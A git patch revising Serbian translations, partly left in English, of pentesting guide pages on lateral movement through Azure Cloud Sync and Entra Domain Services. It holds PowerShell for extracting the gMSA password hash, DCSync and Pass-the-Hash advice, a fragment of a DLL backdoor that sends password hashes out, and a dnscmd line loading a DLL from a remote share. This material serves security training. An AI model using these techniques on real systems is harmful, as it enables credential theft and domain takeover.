From 2dd19541704bd8ace1ba49ccb7ac6c32242231a2 Mon Sep 17 00:00:00 2001 From: Translator Date: Tue, 3 Mar 2026 18:25:47 +0000 Subject: [PATCH] Translated ['', 'src/pentesting-cloud/azure-security/az-lateral-movement --- .../az-cloud-sync.md | 66 +++++++++---------- .../az-domain-services.md | 26 ++++---- 2 files changed, 45 insertions(+), 47 deletions(-) diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.md index 11281933b..9c1f0063a 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.md @@ -2,55 +2,56 @@ {{#include ../../../banners/hacktricks-training.md}} + ## Osnovne informacije -**Cloud Sync** je u suštini novi način Azure-a da **synchronize the users from AD into Entra ID**. +**Cloud Sync** je u suštini novi način Azure-a da **sinhronizuje korisnike iz AD u Entra ID**. -[Iz dokumenata:](https://learn.microsoft.com/en-us/entra/identity/hybrid/cloud-sync/what-is-cloud-sync) Microsoft Entra Cloud Sync je nova ponuda od Microsoft-a dizajnirana da ispuni i postigne vaše ciljeve hibridnog identiteta za sinhronizaciju korisnika, grupa i kontakata u Microsoft Entra ID. To postiže korišćenjem Microsoft Entra cloud provisioning agenta umesto Microsoft Entra Connect aplikacije. Međutim, može se koristiti zajedno sa Microsoft Entra Connect Sync. +[Iz dokumentacije:](https://learn.microsoft.com/en-us/entra/identity/hybrid/cloud-sync/what-is-cloud-sync) Microsoft Entra Cloud Sync je nova usluga od Microsoft-a dizajnirana da ispuni vaše hibridne identity ciljeve za sinhronizaciju korisnika, grupa i kontakata u Microsoft Entra ID. To postiže korišćenjem Microsoft Entra cloud provisioning agenta umesto Microsoft Entra Connect aplikacije. Međutim, može se koristiti i paralelno sa Microsoft Entra Connect Sync. -### Generisani principi +### Principali koji se kreiraju -Da bi ovo funkcionisalo, neki principi se kreiraju u Entra ID i On-Premise direktorijumu: +Da bi ovo radilo, neki principali se kreiraju i u Entra ID i u on-premise direktorijumu: -- U Entra ID, korisnik `On-Premises Directory Synchronization Service Account` (`ADToAADSyncServiceAccount@carloshacktricks.onmicrosoft.com`) se kreira sa ulogom **`Directory Synchronization Accounts`** (`d29b2b05-8046-44ba-8758-1e26182fcf32`). +- U Entra ID je kreiran korisnik `On-Premises Directory Synchronization Service Account` (`ADToAADSyncServiceAccount@carloshacktricks.onmicrosoft.com`) sa rolom **`Directory Synchronization Accounts`** (`d29b2b05-8046-44ba-8758-1e26182fcf32`). > [!WARNING] -> Ova uloga je ranije imala mnogo privilegovanih dozvola i mogla se koristiti za [**escalate privileges even to global admin**](https://medium.com/tenable-techblog/stealthy-persistence-with-directory-synchronization-accounts-role-in-entra-id-63e56ce5871b). Međutim, Microsoft je odlučio da ukloni sve privilegije ove uloge i dodeli joj samo novu **`microsoft.directory/onPremisesSynchronization/standard/read`** koja zapravo ne omogućava izvršavanje bilo koje privilegovane akcije (kao što je modifikovanje lozinke ili atributa korisnika ili dodavanje nove akreditacije SP-u). +> Ova rola je nekada imala mnogo privilegovanih permisija i mogla je biti iskorišćena za [**eskalaciju privilegija čak i do global admin**](https://medium.com/tenable-techblog/stealthy-persistence-with-directory-synchronization-accounts-role-in-entra-id-63e56ce5871b). Međutim, Microsoft je odlučio da ukloni sve privilegije ove role i dodeli joj samo novu privilegiju **`microsoft.directory/onPremisesSynchronization/standard/read`** koja u praksi ne dozvoljava izvođenje privilegovanih akcija (kao što su modifikacija lozinke ili atributa korisnika ili dodavanje novog credential-a SP-u). -- U Entra ID takođe se kreira grupa **`AAD DC Administrators`** bez članova ili vlasnika. Ova grupa je korisna ako se koristi [`Microsoft Entra Domain Services`](./az-domain-services.md). +- U Entra ID se takođe kreira grupa **`AAD DC Administrators`** bez članova ili vlasnika. Ova grupa je korisna ako se koristi [`Microsoft Entra Domain Services`](./az-domain-services.md). -- U AD, ili se kreira Service Account **`provAgentgMSA`** sa SamAcountName kao **`pGMSA_$@domain.com`** (`Get-ADServiceAccount -Filter * | Select Name,SamAccountName`), ili prilagođeni sa [**ovim dozvolama je potreban**](https://learn.microsoft.com/en-us/entra/identity/hybrid/cloud-sync/how-to-prerequisites?tabs=public-cloud#custom-gmsa-account). Obično se kreira podrazumevani. +- U AD, ili se kreira Service Account **`provAgentgMSA`** sa SamAccountName-om kao **`pGMSA_$@domain.com`** (`Get-ADServiceAccount -Filter * | Select Name,SamAccountName`), ili se koristi custom nalog kojem su dodeljene [**ove permisije su potrebne**](https://learn.microsoft.com/en-us/entra/identity/hybrid/cloud-sync/how-to-prerequisites?tabs=public-cloud#custom-gmsa-account). Obično se kreira podrazumevani. > [!WARNING] -> Pored drugih dozvola, Service Account **`provAgentgMSA`** ima DCSync dozvole, omogućavajući **bilo kome ko ga kompromituje da kompromituje celu direktoriju**. Za više informacija o [DCSync proverite ovo](https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/dcsync.html). +> Između ostalih permisija, Service Account **`provAgentgMSA`** ima DCSync permisije, što omogućava **svima koji ga kompromituju kompromitovanje celog direktorijuma**. Za više informacija o DCSync proverite [ovo](https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/dcsync.html). > [!NOTE] -> Podrazumevano, korisnici poznatih privilegovanih grupa kao što su Domain Admins sa atributom **`adminCount` na 1 nisu sinhronizovani** sa Entra ID iz bezbednosnih razloga. Međutim, drugi korisnici koji su deo privilegovanih grupa bez ovog atributa ili koji su dodeljeni visoke privilegije direktno **mogu biti sinhronizovani**. +> Po defaultu korisnici poznatih privilegovanih grupa kao što su Domain Admins sa atributom **`adminCount` postavljenim na 1 se ne sinhronizuju** sa Entra ID iz bezbednosnih razloga. Međutim, drugi korisnici koji su deo privilegovanih grupa bez ovog atributa ili kojima su visoke privilegije dodeljene direktno **mogu biti sinhronizovani**. ## Sinhronizacija lozinki -Odeljak je vrlo sličan onom iz: +Ovo poglavlje je veoma slično onom iz: {{#ref}} az-connect-sync.md {{#endref}} -- **Sinhronizacija heš lozinki** može biti omogućena tako da korisnici mogu **prijaviti se u Entra ID koristeći svoje lozinke iz AD**. Štaviše, kada god se lozinka izmeni u AD, biće ažurirana u Entra ID. -- **Pisanje lozinke** takođe može biti omogućeno, omogućavajući korisnicima da modifikuju svoju lozinku u Entra ID automatski sinhronizujući svoju lozinku u on-premise domenu. Ali prema [trenutnim dokumentima](https://learn.microsoft.com/en-us/entra/identity/authentication/tutorial-enable-sspr-writeback#configure-password-writeback), za ovo je potrebno koristiti Connect Agent, pa pogledajte [Az Connect Sync odeljak](./az-connect-sync.md) za više informacija. -- **Pisanje grupa**: Ova funkcija omogućava članstvima grupa iz Entra ID da se sinhronizuju nazad u on-premises AD. To znači da ako je korisnik dodat u grupu u Entra ID, takođe će biti dodat u odgovarajuću grupu u AD. +- **Password hash synchronization** može biti omogućena tako da će korisnici moći da se **uloguju u Entra ID koristeći svoje lozinke iz AD**. Štaviše, kad god se lozinka izmeni u AD, biće ažurirana i u Entra ID. +- **Password writeback** takođe može biti omogućeno, što dozvoljava korisnicima da promene svoju lozinku u Entra ID i da se ta lozinka automatski sinhronizuje u on-premise domen. Ali prema [trenutnoj dokumentaciji](https://learn.microsoft.com/en-us/entra/identity/authentication/tutorial-enable-sspr-writeback#configure-password-writeback), za ovo je potrebno koristiti Connect Agent, pa pogledajte sekciju o Az Connect Sync-u (./az-connect-sync.md) za više informacija. +- **Groups writeback**: Ova funkcija omogućava da se članstva u grupama iz Entra ID sinhronizuju nazad u on-premises AD. To znači da ako se korisnik doda u grupu u Entra ID, biće dodat i u odgovarajuću grupu u AD. -## Pivotiranje +## Pivoting ### AD --> Entra ID -- Ako se AD korisnici sinhronizuju iz AD u Entra ID, pivotiranje iz AD u Entra ID je jednostavno, samo **kompromitujte lozinku nekog korisnika ili promenite lozinku nekog korisnika ili kreirajte novog korisnika i čekajte dok se ne sinhronizuje u Entra ID direktorijum (obično samo nekoliko minuta)**. +- Ako se AD korisnici sinhronizuju iz AD u Entra ID, pivotovanje iz AD u Entra ID je jednostavno — dovoljno je da **kompromitujete nečiju lozinku, promenite nečiju lozinku ili napravite novog korisnika i sačekate da se sinhronizuje u Entra ID direktorijum (obično samo nekoliko minuta)**. -Tako da biste mogli, na primer -- Kompromitovati **`provAgentgMSA`** nalog, izvršiti DCSync napad, provaliti lozinku nekog korisnika i zatim je koristiti za prijavu u Entra ID. -- Samo kreirati novog korisnika u AD, čekati dok se ne sinhronizuje u Entra ID i zatim ga koristiti za prijavu u Entra ID. -- Modifikovati lozinku nekog korisnika u AD, čekati dok se ne sinhronizuje u Entra ID i zatim je koristiti za prijavu u Entra ID. +Dakle, na primer možete: +- Kompromitovati **`provAgentgMSA`** nalog, izvesti DCSync napad, crack-ovati lozinku nekog korisnika i onda je koristiti za login u Entra ID. +- Jednostavno kreirati novog korisnika u AD, sačekati da se sinhronizuje u Entra ID i onda ga koristiti za login u Entra ID. +- Izmeniti lozinku nekog korisnika u AD, sačekati da se sinhronizuje u Entra ID i onda je koristiti za login u Entra ID. -Da biste kompromitovali **`provAgentgMSA`** akreditive: +Da biste kompromitovali credential-e **`provAgentgMSA`**: ```powershell # Enumerate provAgentgMSA account Get-ADServiceAccount -Filter * -Server domain.local @@ -72,22 +73,22 @@ $Passwordblob = (Get-ADServiceAccount -Identity pGMSA_$ -Properties msDS-Man $decodedpwd = ConvertFrom-ADManagedPasswordBlob $Passwordblob ConvertTo-NTHash -Password $decodedpwd.SecureCurrentPassword ``` -Sada možete koristiti hash gMSA da izvršite Pass-the-Hash napad protiv Entra ID koristeći `provAgentgMSA` nalog i održavate postojanost, što vam omogućava da izvršite DCSync napade protiv AD-a. +Sada možete iskoristiti hash gMSA da izvedete Pass-the-Hash napad protiv Entra ID koristeći nalog `provAgentgMSA` i održite persistence, što vam omogućava da izvršavate DCSync napade protiv AD. -Za više informacija o tome kako kompromitovati Active Directory, pogledajte: +For more information about how to compromise an Active Directory check: {{#ref}} https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/index.html {{#endref}} > [!NOTE] -> Imajte na umu da ne postoji način da se Azure ili EntraID uloge dodele sinhronizovanim korisnicima na osnovu njihovih atributa, na primer, u konfiguracijama Cloud Sync. Međutim, kako bi se automatski dodelile dozvole sinhronizovanim korisnicima, neke **Entra ID grupe iz AD** mogu dobiti dozvole, tako da sinhronizovani korisnici unutar tih grupa takođe dobijaju iste ili se mogu koristiti **dinamičke grupe**, pa uvek proverite dinamička pravila i potencijalne načine za njihovo zloupotrebu: +> Imajte na umu da ne postoji način da se dodeljuju Azure ili EntraID uloge sinhronizovanim korisnicima na osnovu njihovih atributa, na primer u Cloud Sync konfiguracijama. Međutim, da bi se sinhronizovanim korisnicima automatski dodelila dopuštenja, nekim **Entra ID groups from AD** mogu biti dodeljena prava tako da sinhronizovani korisnici unutar tih grupa takođe dobiju ta prava, ili se mogu koristiti **dynamic groups**, pa uvek proverite dynamic rules i potencijalne načine za njihovu zloupotrebu: {{#ref}} ../az-privilege-escalation/az-entraid-privesc/dynamic-groups.md {{#endref}} -Što se tiče postojanosti, [ovaj blog post](https://tierzerosecurity.co.nz/2024/05/21/ms-entra-connect-sync-mothods.html) sugeriše da je moguće koristiti [**dnSpy**](https://github.com/dnSpy/dnSpy) da se unazadi dll **`Microsoft.Online.Passwordsynchronisation.dll`** koji se nalazi u **`C:\Program Files\Microsoft Azure AD Sync\Bin`** i koji koristi Cloud Sync agent za izvršavanje sinhronizacije lozinki, čineći da eksfiltrira hash lozinki korisnika koji se sinhronizuju na udaljeni server. Hash-ovi se generišu unutar klase **`PasswordHashGenerator`** i blog post sugeriše dodavanje nekog koda tako da klasa izgleda ovako (napomena na `use System.Net` i korišćenje `WebClient` za eksfiltraciju hash lozinki): +Regarding persistence [this blog post](https://tierzerosecurity.co.nz/2024/05/21/ms-entra-connect-sync-mothods.html) suggest that it's possible to use [**dnSpy**](https://github.com/dnSpy/dnSpy) to backdoor the dll **`Microsoft.Online.Passwordsynchronisation.dll`** located in **`C:\Program Files\Microsoft Azure AD Sync\Bin`** that is used by the Cloud Sync agent to perform the password synchronization making it exfiltrate the password hashes of the users being synchronized to a remote server. The hashes are generated inside the class **`PasswordHashGenerator`** and the blog post suggest adding some code so the class looks like (note the `use System.Net` and the `WebClient` usage to exfiltrate the password hashes): ```csharp using System; using System.Net; @@ -121,20 +122,17 @@ RawHash = passwordHashData.RawHash } } ``` -NuGet Package restore failed for project AzTokenFinder: Unable to find version '4.3.2' of package 'System.Security.Cryptography.X509Certificates'. -C:\Program Files (x86)\Microsoft SDKs\NuGetPackages\: Package 'System.Security.Cryptography.X509Certificates.4.3.2' is not found on source 'C:\Program Files (x86)\Microsoft SDKs\NuGetPackages\'. -. Please see Error List window for detailed warnings and errors. - ### Entra ID --> AD -- Ako je **Password Writeback** omogućen, mogli biste da modifikujete lozinku nekih korisnika iz Entra ID i ako imate pristup AD mreži, povežite se koristeći njih. Za više informacija pogledajte odeljak [Az Connect Sync section](./az-connect-sync.md) za više informacija jer se writeback lozinke konfiguriše koristeći taj agent. +- If **Password Writeback** is enabled, you could modify the password of some users from Entra ID and if you have access to the AD network, connect using them. For more info check the [Az Connect Sync section](./az-connect-sync.md) section for more information as the password writeback is configured using that agent. -- U ovom trenutku Cloud Sync takođe omogućava **"Microsoft Entra ID to AD"**, ali nakon previše vremena otkrio sam da NE MOŽE da sinhronizuje EntraID korisnike sa AD i da može samo da sinhronizuje korisnike iz EntraID koji su sinhronizovani sa hešom lozinke i dolaze iz domena koji pripada istoj domena šumi kao domena kojoj se sinhronizujemo, kao što možete pročitati na [https://learn.microsoft.com/en-us/entra/identity/hybrid/group-writeback-cloud-sync#supported-groups-and-scale-limits](https://learn.microsoft.com/en-us/entra/identity/hybrid/group-writeback-cloud-sync#supported-groups-and-scale-limits): +- At this point in time Cloud Sync also allows **"Microsoft Entra ID to AD"**, but after too much time I found that it CANNOT synchronize EntraID users to AD and that it can only synchronize users from EntraID that were synchronized with the password hash and come from a domain that belong to the same domain forest as the domain we are synchronizing to as you can read in [https://learn.microsoft.com/en-us/entra/identity/hybrid/group-writeback-cloud-sync#supported-groups-and-scale-limits](https://learn.microsoft.com/en-us/entra/identity/hybrid/group-writeback-cloud-sync#supported-groups-and-scale-limits): -> - Ove grupe mogu sadržati samo lokalno sinhronizovane korisnike i / ili dodatne sigurnosne grupe kreirane u oblaku. -> - Lokalni korisnički nalozi koji su sinhronizovani i članovi ove sigurnosne grupe kreirane u oblaku, mogu biti iz istog domena ili između domena, ali svi moraju biti iz iste šume. +> - Ove grupe mogu sadržavati samo on-premises sinhronizovane korisnike i/ili dodatne bezbednosne grupe kreirane u cloudu. +> - On-premises korisnički nalozi koji su sinhronizovani i članovi ove bezbednosne grupe kreirane u cloudu mogu biti iz istog domena ili iz različitih domena, ali svi moraju biti iz iste foreste. + +Dakle, attack surface (i korisnost) ove usluge je znatno smanjena, jer bi napadač morao kompromitovati početni AD iz kojeg se korisnici sinhronizuju da bi kompromitovao korisnika u drugom domenu (i oboje očigledno moraju biti u istoj foresti). -Dakle, površina napada (i korisnost) ove usluge je značajno smanjena jer bi napadač morao da kompromituje inicijalni AD iz kojeg se korisnici sinhronizuju kako bi kompromitovao korisnika u drugom domenu (i oba moraju biti u istoj šumi očigledno). ### Enumeration ```bash diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.md index 4bace3179..3d6447149 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.md @@ -4,25 +4,25 @@ ## Usluge domena -Microsoft Entra Domain Services omogućava postavljanje Active Directory-ja u Azure bez potrebe za upravljanjem Domain Controllers (u stvari, čak i nemate pristup njima). +Microsoft Entra Domain Services omogućava postavljanje Active Directory-ja u Azure bez potrebe za upravljanjem Domain Controller-ima (zapravo, ni nemate pristup njima). -Njegov glavni cilj je omogućiti pokretanje nasleđenih aplikacija u oblaku koje ne mogu koristiti moderne metode autentifikacije, ili tamo gde ne želite da upiti ka direktorijumu uvek idu nazad na on-premises AD DS okruženje. +Njegov glavni cilj je da omogući pokretanje nasleđenih (legacy) aplikacija u cloudu koje ne mogu da koriste moderne metode autentifikacije, ili tamo gde ne želite da pretrage imenika uvek idu nazad na on-premises AD DS okruženje. -Napomena da, da biste sinhronizovali korisnike kreirane u Entra ID (a koji nisu sinhronizovani iz drugih Active Directory-ja) u AD domain service, morate **promeniti lozinku korisnika** na novu kako bi mogla biti sinhronizovana sa novim AD-om. Zapravo, korisnik nije sinhronizovan iz Microsoft Entra ID u Domain Services dok se lozinka ne promeni. +Imajte na umu da, da biste sinhronizovali korisnike kreirane u Entra ID (a koji nisu sinhronizovani iz drugih Active Directory-ja) sa AD domain service, morate **promeniti lozinku korisnika** na novu da bi se sinhronizovala sa novim AD-om. Zapravo, korisnik se ne sinhronizuje iz Microsoft Entra ID-a u Domain Services dokle god nije promenjena lozinka. > [!WARNING] -> Čak i ako kreirate novu Active Directory domenu, nećete moći potpuno da je upravljate (osim ako ne iskoristite neke miskonfiguracije), što znači da podrazumevano, na primer, ne možete direktno da kreirate korisnike u AD-u. Kreirate ih tako što **sinhronizujete korisnike iz Entra ID.** Možete odabrati da sinhronizujete sve korisnike (čak i one sinhronizovane iz drugih on-premise AD-ova), samo cloud korisnike (korisnike kreirane u Entra ID), ili čak da ih **više filtrirate**. +> Čak i ako kreirate novu Active Directory domenu, nećete moći potpuno da je upravljate (osim iskorišćavanjem nekih pogrešnih konfiguracija), što znači da, na primer, po defaultu ne možete direktno kreirati korisnike u AD-u. Kreirate ih **sinhronizacijom korisnika iz Entra ID-a.** Možete odrediti da se sinhronizuju svi korisnici (čak i oni sinhronizovani iz drugih on-premise AD-ova), samo cloud korisnici (korisnici kreirani u Entra ID-u), ili čak **dodatno ih filtrirati**. > [!NOTE] -> Generalno, zbog nedostatka fleksibilnosti u konfiguraciji nove domene i činjenice da su AD obično već on-premise, ovo nije glavna integracija između Entra ID i AD, ali je ipak interesantno znati kako je kompromitovati. +> Generalno, zbog nedostatka fleksibilnosti u konfiguraciji nove domene i činjenice da su AD-ovi obično već on-premise, ovo nije glavna integracija između Entra ID i AD, ali je i dalje interesantno znati kako je kompromitovati. ### Pivoting -Članovima generisane grupe **`AAD DC Administrators`** dodeljuju se lokalna administratorska prava na VM-ovima koji su domain-joined u managed domain (ali ne na domain controller-ima), jer su dodati u lokalnu administratorsku grupu. Članovi ove grupe takođe mogu da koriste **Remote Desktop** za daljinsko povezivanje na domain-joined VM-ove, i takođe su članovi sledećih grupa: +Članovima kreirane grupe **`AAD DC Administrators`** dodeljena su lokalna administratorska prava na VM-ovima koji su pridruženi upravljanoj domeni (ali ne i na domain controller-e), zato što su dodati u lokalnu grupu administrators. Članovi ove grupe takođe mogu koristiti **Remote Desktop za daljinsko povezivanje na VM-ove priključene domenu**, i takođe su članovi sledećih grupa: -- **`Denied RODC Password Replication Group`**: Ova grupa specificira korisnike i grupe čije lozinke ne mogu biti keširane na RODC-ima (Read-Only Domain Controllers). -- **`Group Policy Creators Owners`**: Ova grupa omogućava članovima da kreiraju Group Policies u domenu. Međutim, njeni članovi ne mogu da primenjuju group policies na korisnike ili grupe niti da uređuju postojeće GPO-ove, tako da nije toliko interesantna u ovom okruženju. -- **`DnsAdmins`**: Ova grupa omogućava upravljanje DNS podešavanjima i bila je zloupotrebljena u prošlosti za [eskalaciju privilegija i kompromitovanje domena](https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html?highlight=dnsadmin#dnsadmins), međutim nakon testiranja napada u ovom okruženju provereno je da je ranjivost zakrpljena: +- **`Denied RODC Password Replication Group`**: Ovo je grupa koja definiše korisnike i grupe čije lozinke ne mogu biti keširane na RODC-ima (Read-Only Domain Controllers). +- **`Group Policy Creators Owners`**: Ova grupa omogućava članovima da kreiraju Group Policy-je u domenu. Međutim, njeni članovi ne mogu primenjivati Group Policy-je na korisnike ili grupe niti uređivati postojeće GPO-e, tako da nije posebno zanimljiva u ovom okruženju. +- **`DnsAdmins`**: Ova grupa omogućava upravljanje DNS podešavanjima i ranije je zloupotrebljena za [escalate privileges and compromise the domain](https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html?highlight=dnsadmin#dnsadmins), međutim nakon testiranja napada u ovom okruženju provereno je da je ranjivost ispravljena: ```text dnscmd TDW52Y80ZE26M1K.azure.hacktricks-training.com /config /serverlevelplugindll \\10.1.0.6\c$\Windows\Temp\adduser.dll @@ -30,14 +30,14 @@ DNS Server failed to reset registry property. Status = 5 (0x00000005) Command failed: ERROR_ACCESS_DENIED 5 0x5 ``` -Imajte na umu da, kako bi se dodelila ova ovlašćenja, unutar AD-a grupa **`AAD DC Administrators`** se postavlja kao član prethodnih grupa, a takođe GPO **`AADDC Computers GPO`** dodaje sve članove domenske grupe **`AAD DC Administrators`** kao Local Administrators. +Note that to grant these permissions, inside the AD, the group **`AAD DC Administrators`** group is made a member of the previous groups, and also the GPO **`AADDC Computers GPO`** is adding as Local Administrators all the members of the domain group **`AAD DC Administrators`**. -Pivoting from Entra ID to an AD created with Domain Services je jednostavno: dovoljno je dodati korisnika u grupu **`AAD DC Administrators`**, pristupiti putem RDP-a bilo kojem/svim mašinama u domenu i moći ćete da ukradete podatke i takođe **kompromitujete domen.** +Pivoting from Entra ID to an AD created with Domain Services is straightforward, just add a user into the group **`AAD DC Administrators`**, access via RDP to any/all the machines in the domain and you will be able to steal data and also **compromise the domain.** -Međutim, pivoting from the domain to Entra ID nije tako lako pošto ništa iz domena nije sinhronizovano u Entra ID. Ipak, uvek check-ujte metadata svih VMs koji su pridruženi, jer njihove dodeljene managed identities mogu imati zanimljiva ovlašćenja. Takođe **dump all the users passwords from the domain** i pokušajte da ih crack-ujete da biste se potom prijavili u Entra ID / Azure. +Međutim, pivoting iz domena ka Entra ID nije tako jednostavan jer se ništa iz domena ne sinhronizuje u Entra ID. Ipak, uvek proverite metadata svih pridruženih VMs, jer njihove dodeljene managed identities mogu imati interesantna ovlašćenja. Takođe, **dump all the users passwords from the domain** and try to crack them to then login into Entra ID / Azure. > [!NOTE] -> Napomena da su u prošlosti nađene i druge ranjivosti u ovom managed AD koje su omogućavale kompromitovanje DCs, [like this one](https://www.secureworks.com/research/azure-active-directory-domain-services-escalation-of-privilege?utm_source=chatgpt.com). Napadač koji kompromituje DC bi vrlo lako mogao održavati persistenciju bez da Azure admins primete ili čak budu u stanju da je uklone. +> Note that in the past other vulnerabilities in this managed AD were found that allowed to compromise the DCs, [like this one](https://www.secureworks.com/research/azure-active-directory-domain-services-escalation-of-privilege?utm_source=chatgpt.com). An attacker compromising the DC could very easily maintain persistence without the Azure admins noticing or even being able to remove it. ### Enumeracija ```bash